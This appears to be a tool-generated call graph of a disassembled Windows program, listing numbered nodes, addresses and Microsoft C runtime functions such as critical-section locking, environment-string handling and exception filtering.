10566->10549 10642 dc8178 LeaveCriticalSection 10567->10642 10569 dcb8f3 10569->10540 10571 dcee2d __FrameHandler3::FrameUnwindToState 10570->10571 10572 dcee5a 10571->10572 10573 dcee37 10571->10573 10580 dcee52 10572->10580 10581 dc6aef EnterCriticalSection 10572->10581 10574 dc7f12 __strnicoll 29 API calls 10573->10574 10574->10580 10576 dcee78 10582 dced93 10576->10582 10578 dcee85 10596 dceeb0 10578->10596 10580->10564 10581->10576 10583 dceda0 10582->10583 10584 dcedc3 10582->10584 10585 dc7f12 __strnicoll 29 API calls 10583->10585 10586 dcb515 ___scrt_uninitialize_crt 73 API calls 10584->10586 10587 dcedbb 10584->10587 10585->10587 10588 dceddb 10586->10588 10587->10578 10589 dcb90f 14 API calls 10588->10589 10590 dcede3 10589->10590 10591 dcd936 ___scrt_uninitialize_crt 48 API calls 10590->10591 10592 dcedef 10591->10592 10599 dd001b 10592->10599 10595 dcb0cb __freea 14 API calls 10595->10587 10641 dc6b03 LeaveCriticalSection 10596->10641 10598 dceeb6 10598->10580 10600 dd0044 10599->10600 10605 dcedf6 10599->10605 10601 dd0093 10600->10601 10603 dd006b 10600->10603 10602 dc7f12 __strnicoll 29 API calls 10601->10602 10602->10605 10606 dd00be 10603->10606 10605->10587 10605->10595 10607 dd00ca __FrameHandler3::FrameUnwindToState 10606->10607 10614 dcd8d7 EnterCriticalSection 10607->10614 10609 dd00d8 10610 dd0109 10609->10610 10615 dcff7b 10609->10615 10628 dd0143 10610->10628 10614->10609 10616 dcd68e ___scrt_uninitialize_crt 48 API calls 10615->10616 10618 dcff8b 10616->10618 10617 dcff91 10631 dcd6f8 10617->10631 10618->10617 10620 dcffc3 10618->10620 10622 dcd68e ___scrt_uninitialize_crt 48 API calls 10618->10622 10620->10617 10621 dcd68e ___scrt_uninitialize_crt 48 API calls 10620->10621 10623 dcffcf CloseHandle 10621->10623 10624 dcffba 10622->10624 10623->10617 10625 dcffdb GetLastError 10623->10625 10626 dcd68e ___scrt_uninitialize_crt 48 API calls 10624->10626 10625->10617 10626->10620 10627 dcffe9 ___scrt_uninitialize_crt 10627->10610 10640 dcd8fa LeaveCriticalSection 10628->10640 10630 dd012c 10630->10605 10632 dcd76e 10631->10632 10633 dcd707 10631->10633 10634 dcb757 __strnicoll 14 API calls 10632->10634 10633->10632 10639 dcd731 10633->10639 10635 dcd773 10634->10635 10636 dcb76a __dosmaperr 14 API calls 10635->10636 10637 dcd75e 10636->10637 10637->10627 10638 dcd758 SetStdHandle 10638->10637 10639->10637 10639->10638 10640->10630 10641->10598 10642->10569 8933 dc56e2 8934 dc56ee __FrameHandler3::FrameUnwindToState 8933->8934 8959 dc508f 8934->8959 8936 dc56f5 8937 dc584e 8936->8937 8947 dc571f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 8936->8947 8998 dc5444 IsProcessorFeaturePresent 8937->8998 8939 dc5855 8940 dc585b 8939->8940 8941 dc6ed5 21 API calls 8939->8941 9002 dc6eeb 8940->9002 8941->8940 8944 dc573e 8945 dc57bf 8970 dc7a56 8945->8970 8947->8944 8947->8945 8983 dc6f1f 8947->8983 8949 dc57c5 8974 dbcd90 8949->8974 8952 dc53ec CallUnexpected GetModuleHandleW 8953 dc57e6 8952->8953 8953->8939 8954 dc57ea 8953->8954 8955 dc57f3 8954->8955 8989 dc6f01 8954->8989 8992 dc50c8 8955->8992 8960 dc5098 8959->8960 9005 dc5200 IsProcessorFeaturePresent 8960->9005 8964 dc50a9 8969 dc50ad 8964->8969 9015 dc6a60 8964->9015 8967 dc50c4 8967->8936 8969->8936 8971 dc7a5f 8970->8971 8973 dc7a64 8970->8973 9087 dc7b7f 8971->9087 8973->8949 9835 dbce30 8974->9835 8981 dc4241 CatchGuardHandler 5 API calls 8982 dbce24 8981->8982 8982->8952 8984 dc6f35 __FrameHandler3::FrameUnwindToState __dosmaperr 8983->8984 8984->8945 8985 dca00a _unexpected 48 API calls 8984->8985 8988 dc847c 8985->8988 8986 dc835d CallUnexpected 48 API calls 8987 dc84a6 8986->8987 8988->8986 8990 dc7020 CallUnexpected 21 API calls 8989->8990 8991 dc6f0c 8990->8991 8991->8955 8993 dc50d4 8992->8993 8994 dc50ea 8993->8994 10222 dc6a72 8993->10222 8994->8944 8996 dc50e2 8997 dc60ca ___scrt_uninitialize_crt 7 API calls 8996->8997 8997->8994 8999 dc545a CallUnexpected std::bad_exception::bad_exception 8998->8999 9000 dc5505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8999->9000 9001 dc5550 CallUnexpected 9000->9001 9001->8939 9003 dc7020 CallUnexpected 21 API calls 9002->9003 9004 dc5863 9003->9004 9006 dc50a4 9005->9006 9007 dc60ab 9006->9007 9024 dc9706 9007->9024 9011 dc60bc 9012 dc60c7 9011->9012 9038 dc9742 9011->9038 9012->8964 9014 dc60b4 9014->8964 9078 dcb105 9015->9078 9018 dc60ca 9019 dc60dd 9018->9019 9020 dc60d3 9018->9020 9019->8969 9021 dc8811 ___vcrt_uninitialize_ptd 6 API calls 9020->9021 9022 dc60d8 9021->9022 9023 dc9742 ___vcrt_uninitialize_locks DeleteCriticalSection 9022->9023 9023->9019 9025 dc970f 9024->9025 9027 dc9738 9025->9027 9028 dc60b0 9025->9028 9042 dcdc17 9025->9042 9029 dc9742 ___vcrt_uninitialize_locks DeleteCriticalSection 9027->9029 9028->9014 9030 dc87de 9028->9030 9029->9028 9059 dcdb28 9030->9059 9033 dc87f3 9033->9011 9036 dc880e 9036->9011 9039 dc976c 9038->9039 9040 dc974d 9038->9040 9039->9014 9041 dc9757 DeleteCriticalSection 9040->9041 9041->9039 9041->9041 9047 dcdca9 9042->9047 9045 dcdc4f InitializeCriticalSectionAndSpinCount 9046 dcdc3a 9045->9046 9046->9025 9048 dcdcca 9047->9048 9049 dcdc31 9047->9049 9048->9049 9050 dcdd32 GetProcAddress 9048->9050 9052 dcdd23 9048->9052 9054 dcdc5e LoadLibraryExW 9048->9054 9049->9045 9049->9046 9050->9049 9052->9050 9053 dcdd2b FreeLibrary 9052->9053 9053->9050 9055 dcdc75 GetLastError 9054->9055 9056 dcdca5 9054->9056 9055->9056 9057 dcdc80 ___vcrt_FlsFree 9055->9057 9056->9048 9057->9056 9058 dcdc96 LoadLibraryExW 9057->9058 9058->9048 9060 dcdca9 ___vcrt_FlsFree 5 API calls 9059->9060 9061 dcdb42 9060->9061 9062 dcdb5b TlsAlloc 9061->9062 9063 dc87e8 9061->9063 9063->9033 9064 dcdbd9 9063->9064 9065 dcdca9 ___vcrt_FlsFree 5 API calls 9064->9065 9066 dcdbf3 9065->9066 9067 dcdc0e TlsSetValue 9066->9067 9068 dc8801 9066->9068 9067->9068 9068->9036 9069 dc8811 9068->9069 9070 dc8821 9069->9070 9071 dc881b 9069->9071 9070->9033 9073 dcdb63 9071->9073 9074 dcdca9 ___vcrt_FlsFree 5 API calls 9073->9074 9075 dcdb7d 9074->9075 9076 dcdb95 TlsFree 9075->9076 9077 dcdb89 9075->9077 9076->9077 9077->9070 9079 dc50b6 9078->9079 9080 dcb115 9078->9080 9079->8967 9079->9018 9080->9079 9082 dca732 9080->9082 9083 dca739 9082->9083 9084 dca77c GetStdHandle 9083->9084 9085 dca7de 9083->9085 9086 dca78f GetFileType 9083->9086 9084->9083 9085->9080 9086->9083 9088 dc7b88 9087->9088 9089 dc7b9e 9087->9089 9088->9089 9093 dc7ac0 9088->9093 9089->8973 9091 dc7b95 9091->9089 9110 dc7c8d 9091->9110 9094 dc7acc 9093->9094 9095 dc7ac9 9093->9095 9119 dca880 9094->9119 9095->9091 9100 dc7add 9102 dcb0cb __freea 14 API calls 9100->9102 9101 dc7ae9 9146 dc7bab 9101->9146 9104 dc7ae3 9102->9104 9104->9091 9106 dcb0cb __freea 14 API calls 9107 dc7b0d 9106->9107 9108 dcb0cb __freea 14 API calls 9107->9108 9109 dc7b13 9108->9109 9109->9091 9111 dc7cfe 9110->9111 9116 dc7c9c 9110->9116 9111->9089 9112 dcd131 WideCharToMultiByte ___scrt_uninitialize_crt 9112->9116 9113 dcb807 __dosmaperr 14 API calls 9113->9116 9114 dc7d02 9115 dcb0cb __freea 14 API calls 9114->9115 9115->9111 9116->9111 9116->9112 9116->9113 9116->9114 9118 dcb0cb __freea 14 API calls 9116->9118 9554 dcd304 9116->9554 9118->9116 9120 dca889 9119->9120 9121 dc7ad2 9119->9121 9168 dca0c5 9120->9168 9125 dcd22d GetEnvironmentStringsW 9121->9125 9126 dcd245 9125->9126 9139 dc7ad7 9125->9139 9127 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 9126->9127 9128 dcd262 9127->9128 9129 dcd26c FreeEnvironmentStringsW 9128->9129 9130 dcd277 9128->9130 9129->9139 9131 dcbc45 __strnicoll 15 API calls 9130->9131 9132 dcd27e 9131->9132 9133 dcd286 9132->9133 9134 dcd297 9132->9134 9135 dcb0cb __freea 14 API calls 9133->9135 9136 dcd131 ___scrt_uninitialize_crt WideCharToMultiByte 9134->9136 9137 dcd28b FreeEnvironmentStringsW 9135->9137 9138 dcd2a7 9136->9138 9137->9139 9140 dcd2ae 9138->9140 9141 dcd2b6 9138->9141 9139->9100 9139->9101 9142 dcb0cb __freea 14 API calls 9140->9142 9143 dcb0cb __freea 14 API calls 9141->9143 9144 dcd2b4 FreeEnvironmentStringsW 9142->9144 9143->9144 9144->9139 9147 dc7bc0 9146->9147 9148 dcb807 __dosmaperr 14 API calls 9147->9148 9149 dc7be7 9148->9149 9150 dc7bef 9149->9150 9159 dc7bf9 9149->9159 9151 dcb0cb __freea 14 API calls 9150->9151 9167 dc7af0 9151->9167 9152 dc7c56 9153 dcb0cb __freea 14 API calls 9152->9153 9153->9167 9154 dcb807 __dosmaperr 14 API calls 9154->9159 9155 dc7c65 9544 dc7b50 9155->9544 9159->9152 9159->9154 9159->9155 9160 dc7c80 9159->9160 9162 dcb0cb __freea 14 API calls 9159->9162 9535 dc96ac 9159->9535 9550 dc7d96 IsProcessorFeaturePresent 9160->9550 9161 dcb0cb __freea 14 API calls 9164 dc7c72 9161->9164 9162->9159 9166 dcb0cb __freea 14 API calls 9164->9166 9165 dc7c8c 9166->9167 9167->9106 9169 dca0d0 9168->9169 9174 dca0d6 9168->9174 9171 dc9b90 __dosmaperr 6 API calls 9169->9171 9170 dc9bcf __dosmaperr 6 API calls 9172 dca0f0 9170->9172 9171->9174 9173 dca0dc 9172->9173 9175 dcb807 __dosmaperr 14 API calls 9172->9175 9177 dca0e1 9173->9177 9215 dc835d 9173->9215 9174->9170 9174->9173 9178 dca100 9175->9178 9193 dcacc3 9177->9193 9180 dca11d 9178->9180 9181 dca108 9178->9181 9183 dc9bcf __dosmaperr 6 API calls 9180->9183 9182 dc9bcf __dosmaperr 6 API calls 9181->9182 9184 dca114 9182->9184 9185 dca129 9183->9185 9189 dcb0cb __freea 14 API calls 9184->9189 9186 dca13c 9185->9186 9187 dca12d 9185->9187 9188 dca31c __dosmaperr 14 API calls 9186->9188 9190 dc9bcf __dosmaperr 6 API calls 9187->9190 9191 dca147 9188->9191 9189->9173 9190->9184 9192 dcb0cb __freea 14 API calls 9191->9192 9192->9177 9194 dcaced 9193->9194 9359 dcab4f 9194->9359 9199 dcad2d 9373 dca94a 9199->9373 9200 dcad1f 9201 dcb0cb __freea 14 API calls 9200->9201 9203 dcad06 9201->9203 9203->9121 9205 dcad65 9206 dcb757 __strnicoll 14 API calls 9205->9206 9207 dcad6a 9206->9207 9210 dcb0cb __freea 14 API calls 9207->9210 9208 dcadac 9209 dcadf5 9208->9209 9384 dcb07e 9208->9384 9214 dcb0cb __freea 14 API calls 9209->9214 9210->9203 9211 dcad80 9211->9208 9212 dcb0cb __freea 14 API calls 9211->9212 9212->9208 9214->9203 9224 dcb1bc 9215->9224 9217 dc8362 9217->9215 9219 dc8377 IsProcessorFeaturePresent 9217->9219 9220 dc6eeb CallUnexpected 21 API calls 9217->9220 9223 dc8839 9217->9223 9227 dcb1e3 9217->9227 9254 dc7dca 9217->9254 9260 dc883a 9217->9260 9219->9217 9220->9217 9274 dcb43f 9224->9274 9228 dcb1ef __FrameHandler3::FrameUnwindToState 9227->9228 9229 dca15b __dosmaperr 14 API calls 9228->9229 9230 dcb23f 9228->9230 9233 dcb251 CallUnexpected 9228->9233 9238 dcb220 CallUnexpected 9228->9238 9229->9238 9231 dcb757 __strnicoll 14 API calls 9230->9231 9234 dcb244 9231->9234 9232 dcb229 9232->9217 9235 dcb287 CallUnexpected 9233->9235 9288 dc8161 EnterCriticalSection 9233->9288 9285 dc7d69 9234->9285 9240 dcb2c4 9235->9240 9241 dcb3c1 9235->9241 9252 dcb2f2 9235->9252 9238->9230 9238->9232 9238->9233 9240->9252 9289 dca00a GetLastError 9240->9289 9243 dcb3cc 9241->9243 9320 dc8178 LeaveCriticalSection 9241->9320 9244 dc6eeb CallUnexpected 21 API calls 9243->9244 9246 dcb3d4 9244->9246 9248 dca00a _unexpected 48 API calls 9250 dcb347 9248->9250 9250->9232 9253 dca00a _unexpected 48 API calls 9250->9253 9251 dca00a _unexpected 48 API calls 9251->9252 9316 dcb36d 9252->9316 9253->9232 9255 dc7de6 CallUnexpected std::bad_exception::bad_exception 9254->9255 9256 dc7e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9255->9256 9257 dc7ee3 CallUnexpected 9256->9257 9343 dc4241 9257->9343 9259 dc7f01 9259->9217 9261 dc8846 GetLastError 9260->9261 9262 dc8843 9260->9262 9351 dcdb9e 9261->9351 9262->9217 9265 dc887a 9266 dc88c0 SetLastError 9265->9266 9266->9217 9267 dcdbd9 ___vcrt_FlsSetValue 6 API calls 9268 dc8874 CallUnexpected 9267->9268 9268->9265 9269 dc889c 9268->9269 9271 dcdbd9 ___vcrt_FlsSetValue 6 API calls 9268->9271 9270 dcdbd9 ___vcrt_FlsSetValue 6 API calls 9269->9270 9272 dc88b0 9269->9272 9270->9272 9271->9269 9356 dc83ac 9272->9356 9275 dcb44b __FrameHandler3::FrameUnwindToState 9274->9275 9280 dc8161 EnterCriticalSection 9275->9280 9277 dcb459 9281 dcb49b 9277->9281 9280->9277 9284 dc8178 LeaveCriticalSection 9281->9284 9283 dcb1e1 9283->9217 9284->9283 9321 dc809f 9285->9321 9288->9235 9290 dca026 9289->9290 9291 dca020 9289->9291 9292 dc9bcf __dosmaperr 6 API calls 9290->9292 9295 dca02a SetLastError 9290->9295 9293 dc9b90 __dosmaperr 6 API calls 9291->9293 9294 dca042 9292->9294 9293->9290 9294->9295 9297 dcb807 __dosmaperr 14 API calls 9294->9297 9299 dca0bf 9295->9299 9300 dca0ba 9295->9300 9298 dca057 9297->9298 9301 dca05f 9298->9301 9302 dca070 9298->9302 9303 dc835d CallUnexpected 46 API calls 9299->9303 9300->9251 9304 dc9bcf __dosmaperr 6 API calls 9301->9304 9305 dc9bcf __dosmaperr 6 API calls 9302->9305 9306 dca0c4 9303->9306 9308 dca06d 9304->9308 9307 dca07c 9305->9307 9309 dca097 9307->9309 9310 dca080 9307->9310 9311 dcb0cb __freea 14 API calls 9308->9311 9312 dca31c __dosmaperr 14 API calls 9309->9312 9313 dc9bcf __dosmaperr 6 API calls 9310->9313 9311->9295 9314 dca0a2 9312->9314 9313->9308 9315 dcb0cb __freea 14 API calls 9314->9315 9315->9295 9317 dcb371 9316->9317 9319 dcb339 9316->9319 9342 dc8178 LeaveCriticalSection 9317->9342 9319->9232 9319->9248 9319->9250 9320->9243 9322 dc80b1 __strnicoll 9321->9322 9327 dc7f12 9322->9327 9328 dc7f22 9327->9328 9330 dc7f29 9327->9330 9329 dc8030 __strnicoll 16 API calls 9328->9329 9329->9330 9331 dc8076 __strnicoll GetLastError SetLastError 9330->9331 9334 dc7f37 9330->9334 9332 dc7f5e 9331->9332 9333 dc7d96 __strnicoll 11 API calls 9332->9333 9332->9334 9335 dc7f8e 9333->9335 9336 dc7fd7 9334->9336 9337 dc7fe3 9336->9337 9338 dc7ffa 9337->9338 9339 dc8013 __strnicoll 48 API calls 9337->9339 9340 dc7d75 9338->9340 9341 dc8013 __strnicoll 48 API calls 9338->9341 9339->9338 9340->9232 9341->9340 9342->9319 9344 dc4249 9343->9344 9345 dc424a IsProcessorFeaturePresent 9343->9345 9344->9259 9347 dc49f4 9345->9347 9350 dc4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9347->9350 9349 dc4ad7 9349->9259 9350->9349 9352 dcdca9 ___vcrt_FlsFree 5 API calls 9351->9352 9353 dcdbb8 9352->9353 9354 dcdbd0 TlsGetValue 9353->9354 9355 dc885b 9353->9355 9354->9355 9355->9265 9355->9266 9355->9267 9357 dcb0cb __freea 14 API calls 9356->9357 9358 dc83c4 9357->9358 9358->9265 9392 dca8c8 9359->9392 9362 dcab70 GetOEMCP 9364 dcab99 9362->9364 9363 dcab82 9363->9364 9365 dcab87 GetACP 9363->9365 9364->9203 9366 dcbc45 9364->9366 9365->9364 9367 dcbc83 9366->9367 9371 dcbc53 __dosmaperr 9366->9371 9368 dcb757 __strnicoll 14 API calls 9367->9368 9370 dcad17 9368->9370 9369 dcbc6e RtlAllocateHeap 9369->9370 9369->9371 9370->9199 9370->9200 9371->9367 9371->9369 9372 dc7207 __dosmaperr 2 API calls 9371->9372 9372->9371 9374 dcab4f 50 API calls 9373->9374 9375 dca96a 9374->9375 9377 dca9a7 IsValidCodePage 9375->9377 9381 dcaa6f 9375->9381 9383 dca9c2 std::bad_exception::bad_exception 9375->9383 9376 dc4241 CatchGuardHandler 5 API calls 9378 dcab4d 9376->9378 9379 dca9b9 9377->9379 9377->9381 9378->9205 9378->9211 9380 dca9e2 GetCPInfo 9379->9380 9379->9383 9380->9381 9380->9383 9381->9376 9432 dcaed9 9383->9432 9385 dcb08a __FrameHandler3::FrameUnwindToState 9384->9385 9509 dc8161 EnterCriticalSection 9385->9509 9387 dcb094 9510 dcae18 9387->9510 9393 dca8e6 9392->9393 9399 dca8df 9392->9399 9394 dca00a _unexpected 48 API calls 9393->9394 9393->9399 9395 dca907 9394->9395 9400 dcd95d 9395->9400 9399->9362 9399->9363 9401 dcd970 9400->9401 9403 dca91d 9400->9403 9401->9403 9408 dcc179 9401->9408 9404 dcd98a 9403->9404 9405 dcd99d 9404->9405 9406 dcd9b2 9404->9406 9405->9406 9429 dca863 9405->9429 9406->9399 9409 dcc185 __FrameHandler3::FrameUnwindToState 9408->9409 9410 dca00a _unexpected 48 API calls 9409->9410 9411 dcc18e 9410->9411 9418 dcc1d4 9411->9418 9421 dc8161 EnterCriticalSection 9411->9421 9413 dcc1ac 9422 dcc1fa 9413->9422 9418->9403 9419 dc835d CallUnexpected 48 API calls 9420 dcc1f9 9419->9420 9421->9413 9423 dcc208 __dosmaperr 9422->9423 9425 dcc1bd 9422->9425 9424 dcbfae __dosmaperr 14 API calls 9423->9424 9423->9425 9424->9425 9426 dcc1d9 9425->9426 9427 dc8178 CallUnexpected LeaveCriticalSection 9426->9427 9428 dcc1d0 9427->9428 9428->9418 9428->9419 9430 dca00a _unexpected 48 API calls 9429->9430 9431 dca868 9430->9431 9431->9406 9433 dcaf01 GetCPInfo 9432->9433 9442 dcafca 9432->9442 9438 dcaf19 9433->9438 9433->9442 9435 dc4241 CatchGuardHandler 5 API calls 9437 dcb07c 9435->9437 9437->9381 9443 dcbced 9438->9443 9441 dcded4 52 API calls 9441->9442 9442->9435 9444 dca8c8 __strnicoll 48 API calls 9443->9444 9445 dcbd0d 9444->9445 9463 dcbdee 9445->9463 9447 dcbdc9 9450 dc4241 CatchGuardHandler 5 API calls 9447->9450 9448 dcbdc1 9466 dcbccd 9448->9466 9449 dcbd3a 9449->9447 9449->9448 9452 dcbc45 __strnicoll 15 API calls 9449->9452 9454 dcbd5f __alloca_probe_16 std::bad_exception::bad_exception 9449->9454 9453 dcaf81 9450->9453 9452->9454 9458 dcded4 9453->9458 9454->9448 9455 dcbdee __strnicoll MultiByteToWideChar 9454->9455 9456 dcbda8 9455->9456 9456->9448 9457 dcbdaf GetStringTypeW 9456->9457 9457->9448 9459 dca8c8 __strnicoll 48 API calls 9458->9459 9460 dcdee7 9459->9460 9472 dcdf1d 9460->9472 9470 dcbe18 9463->9470 9467 dcbcd9 9466->9467 9468 dcbcea 9466->9468 9467->9468 9469 dcb0cb __freea 14 API calls 9467->9469 9468->9447 9469->9468 9471 dcbe0a MultiByteToWideChar 9470->9471 9471->9449 9473 dcdf38 __strnicoll 9472->9473 9474 dcbdee __strnicoll MultiByteToWideChar 9473->9474 9477 dcdf7c 9474->9477 9475 dce0f7 9476 dc4241 CatchGuardHandler 5 API calls 9475->9476 9478 dcafa2 9476->9478 9477->9475 9479 dcbc45 __strnicoll 15 API calls 9477->9479 9481 dcdfa2 __alloca_probe_16 9477->9481 9492 dce04a 9477->9492 9478->9441 9479->9481 9480 dcbccd __freea 14 API calls 9480->9475 9482 dcbdee __strnicoll MultiByteToWideChar 9481->9482 9481->9492 9483 dcdfeb 9482->9483 9483->9492 9500 dc9c5c 9483->9500 9486 dce059 9488 dce0e2 9486->9488 9489 dcbc45 __strnicoll 15 API calls 9486->9489 9493 dce06b __alloca_probe_16 9486->9493 9487 dce021 9491 dc9c5c 6 API calls 9487->9491 9487->9492 9490 dcbccd __freea 14 API calls 9488->9490 9489->9493 9490->9492 9491->9492 9492->9480 9493->9488 9494 dc9c5c 6 API calls 9493->9494 9495 dce0ae 9494->9495 9495->9488 9506 dcd131 9495->9506 9497 dce0c8 9497->9488 9498 dce0d1 9497->9498 9499 dcbccd __freea 14 API calls 9498->9499 9499->9492 9501 dc9f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9500->9501 9502 dc9c67 9501->9502 9503 dc9cb9 __strnicoll 5 API calls 9502->9503 9505 dc9c6d 9502->9505 9504 dc9cad LCMapStringW 9503->9504 9504->9505 9505->9486 9505->9487 9505->9492 9508 dcd144 ___scrt_uninitialize_crt 9506->9508 9507 dcd182 WideCharToMultiByte 9507->9497 9508->9507 9509->9387 9520 dca7e2 9510->9520 9512 dcae3a 9513 dca7e2 48 API calls 9512->9513 9514 dcae59 9513->9514 9515 dcae80 9514->9515 9516 dcb0cb __freea 14 API calls 9514->9516 9517 dcb0bf 9515->9517 9516->9515 9534 dc8178 LeaveCriticalSection 9517->9534 9519 dcb0ad 9519->9209 9521 dca7f3 9520->9521 9530 dca7ef CatchIt 9520->9530 9522 dca7fa 9521->9522 9523 dca80d std::bad_exception::bad_exception 9521->9523 9524 dcb757 __strnicoll 14 API calls 9522->9524 9527 dca83b 9523->9527 9528 dca844 9523->9528 9523->9530 9525 dca7ff 9524->9525 9526 dc7d69 __strnicoll 48 API calls 9525->9526 9526->9530 9529 dcb757 __strnicoll 14 API calls 9527->9529 9528->9530 9532 dcb757 __strnicoll 14 API calls 9528->9532 9531 dca840 9529->9531 9530->9512 9533 dc7d69 __strnicoll 48 API calls 9531->9533 9532->9531 9533->9530 9534->9519 9536 dc96ba 9535->9536 9537 dc96c8 9535->9537 9536->9537 9542 dc96e0 9536->9542 9538 dcb757 __strnicoll 14 API calls 9537->9538 9539 dc96d0 9538->9539 9540 dc7d69 __strnicoll 48 API calls 9539->9540 9541 dc96da 9540->9541 9541->9159 9542->9541 9543 dcb757 __strnicoll 14 API calls 9542->9543 9543->9539 9545 dc7b7a 9544->9545 9546 dc7b5d 9544->9546 9545->9161 9547 dc7b74 9546->9547 9548 dcb0cb __freea 14 API calls 9546->9548 9549 dcb0cb __freea 14 API calls 9547->9549 9548->9546 9549->9545 9551 dc7da2 9550->9551 9552 dc7dca CallUnexpected 8 API calls 9551->9552 9553 dc7db7 GetCurrentProcess TerminateProcess 9552->9553 9553->9165 9555 dcd30f 9554->9555 9556 dcd320 9555->9556 9559 dcd333 ___from_strstr_to_strchr 9555->9559 9557 dcb757 __strnicoll 14 API calls 9556->9557 9566 dcd325 9557->9566 9558 dcd54a 9560 dcb757 __strnicoll 14 API calls 9558->9560 9559->9558 9561 dcd353 9559->9561 9562 dcd54f 9560->9562 9617 dcd56f 9561->9617 9564 dcb0cb __freea 14 API calls 9562->9564 9564->9566 9566->9116 9567 dcd397 9568 dcd383 9567->9568 9621 dcd589 9567->9621 9574 dcb0cb __freea 14 API calls 9568->9574 9569 dcd399 9569->9568 9573 dcb807 __dosmaperr 14 API calls 9569->9573 9570 dcd375 9576 dcd37e 9570->9576 9577 dcd392 9570->9577 9575 dcd3a7 9573->9575 9574->9566 9579 dcb0cb __freea 14 API calls 9575->9579 9581 dcb757 __strnicoll 14 API calls 9576->9581 9582 dcd56f 48 API calls 9577->9582 9578 dcd40c 9583 dcb0cb __freea 14 API calls 9578->9583 9580 dcd3b2 9579->9580 9580->9567 9580->9568 9586 dcb807 __dosmaperr 14 API calls 9580->9586 9581->9568 9582->9567 9588 dcd414 9583->9588 9584 dcd457 9584->9568 9585 dcd0c4 51 API calls 9584->9585 9587 dcd485 9585->9587 9589 dcd3ce 9586->9589 9590 dcb0cb __freea 14 API calls 9587->9590 9593 dcd441 9588->9593 9625 dcd0c4 9588->9625 9592 dcb0cb __freea 14 API calls 9589->9592 9590->9593 9592->9567 9593->9568 9593->9593 9597 dcb807 __dosmaperr 14 API calls 9593->9597 9615 dcd53f 9593->9615 9594 dcb0cb __freea 14 API calls 9594->9566 9595 dcd438 9596 dcb0cb __freea 14 API calls 9595->9596 9596->9593 9598 dcd4d0 9597->9598 9599 dcd4d8 9598->9599 9600 dcd4e0 9598->9600 9601 dcb0cb __freea 14 API calls 9599->9601 9602 dc96ac ___std_exception_copy 48 API calls 9600->9602 9601->9568 9603 dcd4ec 9602->9603 9604 dcd564 9603->9604 9605 dcd4f3 9603->9605 9607 dc7d96 __strnicoll 11 API calls 9604->9607 9634 dcf9bc 9605->9634 9609 dcd56e 9607->9609 9610 dcd539 9613 dcb0cb __freea 14 API calls 9610->9613 9611 dcd51a 9612 dcb757 __strnicoll 14 API calls 9611->9612 9614 dcd51f 9612->9614 9613->9615 9616 dcb0cb __freea 14 API calls 9614->9616 9615->9594 9616->9568 9618 dcd57c 9617->9618 9619 dcd35e 9617->9619 9649 dcd5de 9618->9649 9619->9567 9619->9569 9619->9570 9622 dcd3fc 9621->9622 9624 dcd59f 9621->9624 9622->9578 9622->9584 9624->9622 9664 dcf8cb 9624->9664 9626 dcd0ec 9625->9626 9627 dcd0d1 9625->9627 9629 dcd0fb 9626->9629 9764 dcf6f8 9626->9764 9627->9626 9628 dcd0dd 9627->9628 9630 dcb757 __strnicoll 14 API calls 9628->9630 9771 dcf72b 9629->9771 9633 dcd0e2 std::bad_exception::bad_exception 9630->9633 9633->9595 9783 dcc274 9634->9783 9639 dcc274 48 API calls 9642 dcfa0c 9639->9642 9640 dcfa3b 9644 dcd514 9640->9644 9646 dcb0cb __freea 14 API calls 9640->9646 9641 dcfa2f 9641->9640 9643 dcb0cb __freea 14 API calls 9641->9643 9645 dcc30c 17 API calls 9642->9645 9643->9640 9644->9610 9644->9611 9647 dcfa19 9645->9647 9646->9644 9647->9641 9648 dcfa23 SetEnvironmentVariableW 9647->9648 9648->9641 9650 dcd5f1 9649->9650 9657 dcd5ec 9649->9657 9651 dcb807 __dosmaperr 14 API calls 9650->9651 9661 dcd60e 9651->9661 9652 dcd67c 9654 dc835d CallUnexpected 48 API calls 9652->9654 9653 dcd66b 9655 dcb0cb __freea 14 API calls 9653->9655 9656 dcd681 9654->9656 9655->9657 9658 dc7d96 __strnicoll 11 API calls 9656->9658 9657->9619 9659 dcd68d 9658->9659 9660 dcb807 __dosmaperr 14 API calls 9660->9661 9661->9652 9661->9653 9661->9656 9661->9660 9662 dcb0cb __freea 14 API calls 9661->9662 9663 dc96ac ___std_exception_copy 48 API calls 9661->9663 9662->9661 9663->9661 9665 dcf8df 9664->9665 9666 dcf8d9 9664->9666 9682 dcf8f4 9665->9682 9668 dd0199 9666->9668 9669 dd01e1 9666->9669 9672 dd019f 9668->9672 9675 dd01bc 9668->9675 9702 dd01f7 9669->9702 9674 dcb757 __strnicoll 14 API calls 9672->9674 9673 dd01af 9673->9624 9676 dd01a4 9674->9676 9678 dcb757 __strnicoll 14 API calls 9675->9678 9681 dd01da 9675->9681 9677 dc7d69 __strnicoll 48 API calls 9676->9677 9677->9673 9679 dd01cb 9678->9679 9680 dc7d69 __strnicoll 48 API calls 9679->9680 9680->9673 9681->9624 9683 dca8c8 __strnicoll 48 API calls 9682->9683 9684 dcf90a 9683->9684 9685 dcf926 9684->9685 9686 dcf93d 9684->9686 9698 dcf8ef 9684->9698 9687 dcb757 __strnicoll 14 API calls 9685->9687 9688 dcf958 9686->9688 9689 dcf946 9686->9689 9690 dcf92b 9687->9690 9692 dcf978 9688->9692 9693 dcf965 9688->9693 9691 dcb757 __strnicoll 14 API calls 9689->9691 9694 dc7d69 __strnicoll 48 API calls 9690->9694 9695 dcf94b 9691->9695 9720 dd02c2 9692->9720 9696 dd01f7 __strnicoll 48 API calls 9693->9696 9694->9698 9699 dc7d69 __strnicoll 48 API calls 9695->9699 9696->9698 9698->9624 9699->9698 9701 dcb757 __strnicoll 14 API calls 9701->9698 9703 dd0207 9702->9703 9704 dd0221 9702->9704 9707 dcb757 __strnicoll 14 API calls 9703->9707 9705 dd0229 9704->9705 9706 dd0240 9704->9706 9708 dcb757 __strnicoll 14 API calls 9705->9708 9709 dd024c 9706->9709 9710 dd0263 9706->9710 9711 dd020c 9707->9711 9712 dd022e 9708->9712 9713 dcb757 __strnicoll 14 API calls 9709->9713 9717 dca8c8 __strnicoll 48 API calls 9710->9717 9718 dd0217 9710->9718 9714 dc7d69 __strnicoll 48 API calls 9711->9714 